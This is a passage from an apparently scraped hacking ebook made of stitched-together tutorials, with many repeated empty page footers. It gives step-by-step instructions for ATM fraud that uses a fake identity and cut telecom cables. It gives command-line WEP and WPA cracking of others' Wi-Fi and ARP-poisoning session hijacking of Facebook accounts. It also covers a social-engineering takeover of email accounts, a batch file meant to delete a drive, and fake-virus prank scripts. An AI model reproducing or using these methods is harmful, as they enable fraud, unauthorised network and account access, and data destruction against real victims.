A big hello to: Rubix the Cube, The Conflict, Monalisa Overdrive /e +- Shamelessly Leeched from The Mudd Club -+ Hack Tutrial:+ --> HACKING ATM'S <-+ Welcome everybody to my first article dealing with the manipulation of the Bank's Automated Teller Machines for the gain of money.. In this article I will show you many ways to 'beat' the system. Some methods of hacking into ATM's are very easy and others are a bit more difficult. I suggest you pick the method that mostly suits you. Okay Lets get straight into it.... 1.0 Different types of Automatic Tellers ============================================There are 3 major types of Automatic teller machines. IBM ===The first of these (and the most popular) is the IBM model. This is easily distinguised from the others by the IBM logo in the top right hand corner of the front of the machine. This unit features a touch sensitive keypad and a 1 line display with a visor that moves up and down. (The newer models have a 5 line display).. NCR
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 149
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree ===The second unit is the NCR unit, which is MUCH smaller than than the IBM front panel. This unit has a small VDU as well as a touch sensitive keypad. The only banks that seem to be using this unit in Australia is the 'STATE BANK' of Victoria, so you will not see many of them around. PHILIPS =======The third and final unit is made by Philips as is only used by the credit unions or Building Societys. This is usually known as 'CASHCARD'. These units feature a push-button keyboard and a VDU (like the NCR). All these above units provide the same functions... 1.1 Information on the Plastic Cards ======================================The Plastic Cards that you put into these cash carrying monsters have a Number that is printed on the front of the card (which is also the same number, that is stored on the MAGNETIC STRIP on the back of the card.) What do these numbers mean????? Well here is some information on them... The Numbers are split up into 2 groups, the first group ALWAYS contains SIX numbers while the second group contains anywhere between 6 to 13 numbers. EG) 560192 3012565214782 \ /\ / | |__ This 3 digit number identifies the Bank. | |__ This is the Australian ID code and ALL banks have this. Some ID's for banks =================== 192 - Westpac Banking Corporation 251 - National Australia Bank 220 - Commenwealth Bank The Second part of the number seems to be a jumble of digits for 6 to 13, which only seem to make sense to the banks computer. The banks computer simply looks the second number up in a Table and finds out your assigned PIN number (A password for your card consisting of 4 digits), and any other information. eg) Your savings account no. Cheque a/c etc. Since the four Digit PIN (Personal Identification Numbers) range from 0000 to 9999, then more than one person has the same PIN number for his card. (Banks do have more that 10,000 customers !!) Okay now that we have some simple background information we can learn how to 'defeat' the system.. 1.2 The "CABLE CUTTER METHOD" =============================== For this method you will require the Follwing: (1) - Guts (2) - Good Pair of SIDCHROME cutters (3) - Fake ID (library cards, Concession Cards etc.) Okay the First Step is to open up a bank savings account at one of the banks that gives you access to the ATM.. The Major banks have the following Packages: Westpac - Advantage Saver National - Flexi Card Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 150
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree C'wealth - Key Card I suggest you go for National Bank as their limit is $500 per day, where Westpac has a $200 Max Limit per day.. Give them an address where you can check the mail everyday (so you can receive your card and PIN number)...An old house etc. will do very well. Make sure you open the account at a 'small' suburb branch, that has computer equipment installed. Once you have finally received your brand new savings account with fake name and addreYour account record is kept at your branches computer. So what the main computer does is get in touch with the branches (on the network) and ask it information on your account. (Balance etc.). Ok so what do we do with the cutters??? Well go to your banks branch (at about 10.00 - 11.00 pm), Find the Concrete Telecom cover near the bank and lift it off using the handle of the Cutters. Ok, See if there are cables leading from the main tube into a smaller tube that leads underground into the bank...Well take your cutters and snip them..Ok well congratulations you have just cut the phone cables for all their phones and their branch computer system.. If you wanna be a bit more sure that you cut the cable to the computer, Snip every cable in sight of the bank. (Use insulated cutters and don't be afraid of the sparks and mini fire works.)Ok the banks compuer should be disabled now, so go to the nearest ATM you can find and pop your card in and try to do a ' ACCOUNT BALANCE '. You should get a NOT AVAILABLE - try again Later ERROR..If you do then start jumping up and down cause you have done it!! You see the main computer is programmed to give you whatever money you ask for when the lines are down, so they will not inconvenience the customers. So punch in the max. LIMIT any time before 12 midnight and then take out another batch after 12.00 midnight (or whatever other time you can).. When they Fix the Lines, the main computer will update the balance in the branches computer... (he he). Your account will have a Debit Balance and the bank manager will come after you..But he won't find you will he!! The major banks that to use this new system are: Westpac and National. I have tried it with both banks and it works great. Although I prefer National Bank since you can make $1,000 in a few minutes. Link:- http://www.textfiles.com/hacking/ Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 151
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 152
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 153
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 154
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 155
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 156
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 157
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 158
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 159
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 160
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 161
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 162
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 163
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 164
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 165
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 166
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 167
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 168
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 169
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 170
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 171
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 172
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 173
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 174
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 175
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 176
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 177
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 178
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 179
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 180
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 181
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial:how to hack wifi on windows :Author:-TAHIR HOW TO HACK WEP WIFI PASSWORD First of all, what we gonna do is download aircrack-ng for window http://download.aircrack-ng.org/aircrack-ng-1.1-win.zip Then second is we go to download peek for aircrack http://www.tutofr.com/tutoriaux/crackwep/fichiers/wlan/winxp/Peek.zip Then we download CommView For Wifi http://www.tamos.com/files/ca6.zip Okay, we extract the aircrack that we just download to C:/ The peek need to install to c:/ aircrack-ng-1.1-win/bin/ Install ca6 "commview for wifi" OKAY LETS START..Okay...look, the IVs that we captured is not enough to make decryption the key...so we just captures the packet and save it.after that we choose again the packet...just add or "choose" so the captured file (*.cap) will be used by aircrack-ng more than 1 (*.cap) file for decryption the key... If the picture below shown, you just need to insert "index number of target network" set it to "1" and press (enter) The IVs maybe can change to more higher, but just do what I mention above... KEY OUND !! This is just tutorial for using aircrack-ng and commviewfor wifi on O.S running under Window 7.. Hacking tutorial on 4shared search(Hack book Pakistani TAhir 3 wifi hack win).apk Hack Tutrial:1. World Trade Center Attack Trick world trade center trick The flight number of the plane that had hit World Trade Center on (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick. 1. Open Notepad and Type “Q33N” (without quotes) in capital letters. 2. Increase the font size to 72. 3. Change the Font to Wingdings. World Trade Center Notepad Trick 2. Matrix Effect Trick matrix effect trick In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.1. Open Noteapad and copy below code into it. @echo off color 02 :start Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 182
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start 2. Now save this file as Matrix.bat (name can be anything but .bat is must) 3. Open your saved file and you will have matrix effect on your screen. Matrix Effect Using Notepad Advance Matrix Effect 3. Creating Virus That Format C Drive computer virus In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer. 1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y 2. Then Save this file as virus.bat 3. Now, running this file format C Drive. Learn To Make Dangerous Virus In Minute 4. Making Personal Diary Using Notepad notepad tricks Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper. 1. Open Notepad and Type .LOG (in capital Letters and press enter 2. Save the program with any name and close it. 3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad Make Personal Diary Using Notepad 5. Dancing Keyboard Led keyboard dancing led In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script. 1. Open Notepad and copy below codes into it. Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop 2. Then save this file as dance.vbs (name can be anything but .vbs is must) 3. Open your save file and see your keyboard led blinking like disco lights. Keyboard Dancing Led Light Trick Hack Tutrial:Prank Name: shutdown.bat Description: This makes your friend think that his/her computer has a virus then their computer shuts down.1. Go to notepad and type:@echo off :A cls echo Do you wanna crash your computer? (y/n) pause echo Are you sure? (y/n) pause Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 183
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree echo your computer will crash when the time reaches zero. pause msg * Your computer will crash in... msg * 5 msg * 4 msg * 3 msg * 2 msg * 1 msg * Good-Bye msg * You have been pwned! :) shutdown -s -t 00 2. Now save it as shutdown.bat 5.Prank Name: up.bat Description: Shows a fake username and password entrance area then deletes it self 1.Go into notepad and type:@echo off echo If the proper username and password is not entered all files will be deleted by this virus. echo Good Luck set/p\/name=username: set/p\/password=password: echo haha you got the username and password wrong pause echo Files are being deleted pause dir/s del "c:up.bat" 3. Save it as up.bat (must be this!) 6.Prank Name: CD Drive Open and close Description: This vbs file will continually open your CD drive v 1. Go into notepad 2. Type the text below Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop 3. Save it as cdopen.vbs Trick Make Your Computer Speak What You Type!!!!!!!!!!!!!!!!!! Picture 1.Open Notepad and copy and paste the following code into it. Dim message, sapi message=InputBox(“What do you want me to say?”,”Speak to Me”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message 2.Now save the notepad file with the name speak.vbs at your desktop. 3.Now double click on speak.vbs Type in the box whatever you want your computer to speak for you. Picture NOTE: In case if it displays an error message while opening, edit it with notepad and re-type all the quote marks (“) Hack Tutrial:Backtrack install method USB method using just a USB drive, you can run backtrack on any computer without installing anything. What you need: 4GB+ USB flash drive *Windows PC *BackTrack 5 ISO file *UNetbootin Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 184
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 1. Download the BackTrack 5 ISO from http://www.backtracklinux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either. 2. Download UNetbootin from http://unetbootin.sourceforge.net/ for windows and install it. 3. Plug your USB drive into your PC 4. Format the USB drive to FAT3 Note: this will delete all files on the flash drive. 5. Open UNetbootin and choose diskimage 6. Select the BackTrack 5 ISO file you downloaded. 7. Set the amount of space you would like to use for persistence in MB 8. Select your USB drive to create a bootable BackTrack 5 9. Now when you plug your flash drive into any computer and turn it on, you can boot off the flash drive. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your USB drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor. 10. DVD method using just a DVD, you can run backtrack on any computer with a dvd drive without installing anything. What you need: *Blank DVD and DVD burner *Windows PC *BackTrack 5 ISO file *Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero 1. Download the BackTrack 5 ISO from http://www.backtracklinux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either. 2. Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed. 3. Now when you insert your DVD into any computer and turn it on, you can boot off the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor. 4. Dual-boot method setup BackTrack 5 to dual boot along side your Windows 7 installation. When you boot up your computer, you'll be able to choose if you want to boot into Windows 7 or boot into BackTrack 5 What you need: *Blank DVD and DVD burner *Windows PC *BackTrack 5 ISO file *Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero Download the BackTrack 5 ISO from http://www.backtracklinux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either. Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed.With the DVD in your drive, reboot and boot of the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor. Once your at the BackTrack 5 desktop, you will see an install file on the desktop. Run this and follow the steps until installation is completed. It will ask you for your langutime zone, and how much of your hard drive you'd like to use for BackTrack Reboot, and you will now have the option to boot into Windows 7 or BackTrack 5 Hack Tutrial:Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 185
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree CRACKING WEP (EASY) THIS TUTORIAL GOES OVER AN EASIER METHOD TO CRACK WEP THATS MOSTLY AUTOMATED AND DOESN 'T REQUIRE ANY CODING TO BE TYPED IN . THIS METHOD ONLY TAKES ABUT 5 MINUTES . What you need:- Backtrack 5 on either a DVD, flash drive, dual boot, etc. ( you can get this from http://www.backtrack-linux.org/downloads/ ) - A wifi card that can inject. If you boot backtrack off a VMware, the wifi card must be USB 1. Boot into backtrack 5. If you've never done this before, refer to the website where you can download it. Basically you can boot directly off a flash drive (my favorite), off a DVD, or you can setup a VMware. When you first boot up backtrack it will ask you for a username and password, which is root // toor and then you will need to type startx 2. Once you're at the backtrack 5 desktop screen, click applications > backtrack > exploitation tools > wireless exploitation > wlan exploitation > gerix-wifi-crackerng 3. Goto the config tab 4. Click on your wireless card in the top box 5. Click enable/disable monitor mode 6. This will create a new wireless device in the box; select this. (note: after selecting, you may need to press set random mac address) 7. Choose all channels in the drop down, or if you know the channel the wifi you want to hack into is on, choose that. 8. Click on rescan and click on the network you want to hack 9. Goto the WEP tab 10. If you have low signal, you'll want to use the chopchop options to crack the WEP. If you have a stronger signal, you'll be using the fragmentation options. Click all of the buttons in the section you choose, starting from the top working your way down. Command windows appear, if they ask you anything say yes. 11. You'll see your IV's going up. Wait until you have about 15,000 IV's before continuing to the next step. 12. Goto the cracking tab 13. Click aircrack-ng decrypt wep password 14. You're done :)As always, this tutorial is for educational purposes only. Stealing internet is illegal Hack Tutrial:Cracking WEP THIS CHAPTER WILL TEACH YOU HOW TO CRACK THE WEP OF A WIRELESS NETWORK USING BACKTRACK 4 STEP BY STEP . BACKTRACK IS A FREE OS AVAILABLE FOR DOWNLOAD AT HTTP://WWW.BACKTRACK -LINUX .ORG/DOWNLOADS /. THIS TUTORIAL IS USING BACKTRACK 4, BUT IT SHOULD WORK SIMILAR IN NEWER VERSIONS . BACKTRACK IS THE ULTIMATE SECURITY TESTING OS, AND IS PRELOADED WITH HUNDREDS OF TOOLS YOU CAN USE TO HACK . WE'RE ONLY GOING TO BE USING A COUPLE FOR THIS TUTORIAL.WHAT YOU WILL NEED : *C OMPUTER (WINDOWS, MAC, LINUX, ANY OS) *WIRELESS CARD THAT SUPPORTS PROMISCUOUS MODE (MOST DO, IF YOURS ISN 'T COMPATIBLE YOU CAN BUY ONE THAT IS AT ANY COMPUTER STORE . C HECK COMPATIBILITY Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 186
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree HERE: HTTP://WWW .AIRCRACK NG.ORG /DOKU . PHP? ID=COMPATIBILITY _DRIVERS&DOKU WIKI =68B 8D15896F 4851257A 33 E81
33350DD7#WHICH_IS_THE_BEST_ CARD_TO_BUY) *OPTIONAL: FLASH DRIVE OR BLANK DVD 1. Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website. 2. Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor 3. Now type startx and press enter. This will log you into backtrack and you should now see the desktop. 4. Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen. 5. type in: airmon-ng 6. Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is. 7. type: airmon-ng stop wlan0 8. type: macchanger --mac 00:11:22:33:44:55 wlan0 9. type: airmon-ng start wlan0 10. type: airodump-ng wlan0 11. You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack. 12. type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0 13. Keep that window open, now open another command terminal and enter the following in the newly opened terminal: 14. type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0 15. type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0 16. Now go back to the 1st window, you'll notice a number steadily increasing. Once its over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the # is even higher, try again at 15,000 and so on 17. open a new command window and type: aircrack-ng -b (enter bssid) wephack0.cap 18. You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WEP on the screen :)NOTES:Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take awhile for you to get enough packets to crack the WEP. It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk. Hack Tutrial:CRACKING WPA THIS CHAPTER WILL TEACH YOU HOW TO CRACK THE WPA OF A WIRELESS NETWORK USING BACKTRACK 4 STEP BY STEP . BACKTRACK IS A FREE OS AVAILABLE FOR DOWNLOAD AT HTTP://WWW.BACKTRACK -LINUX .ORG/DOWNLOADS /. THIS TUTORIAL IS USING BACKTRACK 4, Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 187
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree BUT IT SHOULD WORK SIMILAR IN NEWER VERSIONS . BACKTRACK IS THE ULTIMATE SECURITY TESTING OS, AND IS PRELOADED WITH HUNDREDS OF TOOLS YOU CAN USE TO HACK . WE'RE ONLY GOING TO BE USING A COUPLE FOR THIS TUTORIAL. C RACKING WPA ISN'T 100% GOING TO WORK EVERYTIME. IT DEPENDS ON HOW EASY THEIR
WPA PASSWORD IS, AND HOW GOOD YOUR DICTIONARY FILE IS . WHAT YOU WILL NEED : *C OMPUTER (WINDOWS, MAC, L INUX, ANY OS) *WIRELESS CARD THAT SUPPORTS PROMISCUOUS MODE (MOST DO, IF YOURS ISN 'T COMPATIBLE YOU CAN BUY ONE THAT IS AT ANY COMPUTER STORE . C HECK COMPATIBILITY HERE: HTTP://WWW.AIRCRACK NG.ORG /DOKU . PHP? ID=COMPATIBILITY _DRIVERS&DOKU WIKI =68B 8D15896F 4851257A 33 E81 33350DD7#WHICH_IS_THE_BEST_ CARD_TO_BUY) *DICTIONARY FILE (BACKTRACK COMES WITH A COUPLE) *OPTIONAL : F LASH DRIVE OR BLANK DVD 1. Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website. 2. Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor 3. Now type startx and press enter. This will log you into backtrack and you should now see the desktop. 4. Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen. 5. type in: airmon-ng 6. Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is. 7. type: airmon-ng stop wlan0 8. type: macchanger --mac 00:11:22:33:44:55 wlan0 9. type: airmon-ng start wlan0 10. type: airodump-ng wlan0 11. You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack. 12. type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0 13. Keep that window open, now open another command terminal and enter the following in the newly opened terminal: 14. type: aireplay-ng -0 5 -a (enter bssid here) wlan0 15. type: aircrack-ng wpahack.cap -w (path to a dictionary file) 16. You should now see it attempting to crack the WPA key. This could take awhile depending on how big the dictionary file is, and how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WPA on the screen :)NOTES:This won't work if you dont get a WPA handshake. The command terminal will let you know if you've received the WPA handshake or not. Hacking WPA isn't 100% going to work every time. It will only work if their WPA password is in the dictionary file you're using. The bigger the dictionary file, the better your chances, the longer it will take. It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk. Hack Tutrial:Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 188
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Sniff with Firefox THIS METHOD WILL SHOW YOU HOW TO GAIN ACCESS TO SOMEONES FACEBOOK ACCOUNT USING YOUR COMPUTER RUNNING FIREFOX. WORKS SIMILAR TO THE ANDROID PHONE METHOD , JUST HAS A COUPLE MORE STEPS . THIS REQUIRES :A COMPUTER RUNNING F IREF OX 3. F IREFOX 4 WILL NOT WORK *MUST BE ON THE SAME NETWORK AS THE PERSON YOUR TRYING TO GAIN ACCESS TO *THE FIRESHEEP PLUGIN FOR FIREFOX. Y OU CAN GET THIS AT HTTP://CODEBUTLER .COM/FIRESHEEP *ALSO REQUIRES CAIN & ABEL. YOU CAN GET THIS AT HTTP://WWW.OXID.IT/CAIN.HTML 1. Install both of the above programs. Open cain and abel 2. goto configure. Select your wireless card, it should be the only one with an IP address that isn't all 0's. 3. Goto the sniffer tab 4. Make sure the wireless card icon is pressed (2nd icon from the left) 5. Hit the blue + icon 6. make sure all hosts is selected, and press ok 7. Routers should now show up in the list. Right click any that show up and choose resolve host name. This may take a few seconds 8. Now click the APR tab at the bottom 9. Press the blue + icon 10. Click on the router in the left box, then select everything in the right box. press OK 11. now press the APR button top left (its 3rd icon from the left, next to the wireless card icon) 12. Now open up Firefox, and open the firesheep plugin. 13. Press the start capturing button 14. As soon as someone on the network your connected to logs into their facebook, they will show up in the firesheep list. You simply click on them and you'll be logged into their account. As always, this is for educational purposes only. It is illegal to hack into an account of someone else. Use at your own risk. Hack Tutrial:SOCIAL ENGINEERING This is probably the easiest method to get access to an e-mail account, and it really isn't hacking at all as much as it is playing off the stupidity of others. This will work for most e-mail services, such as gmail, yahoo, hotmail, etc Here are a list of websites that will help you gather information you might need for this tutorial: http://www.spokeo.com/ http://www.pipl.com/ http://www.zabasearch.com/ http://com.lullar.com/ http://www.emailfinder.com/ http://www.zoominfo.com/ 1. The first step, is to obtain the victims e-mail address. This can be as easy as asking them for it in a non-suspicious way. The websites listed above can help you obtain their e-mail as well. Once you have their e-mail address, proceed to step 2. 2. For this example, we're going to presume or victim is using gmail, but the steps are about the same for any other service. Go to gmail, click I cannot access my account. For other e-mail services, it may be i forgot my password. What we're trying to do is get access to the security questions. For gmail it wont ask you the questions right away, it will send a password reset e-mail to the alternate e-mail Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 189
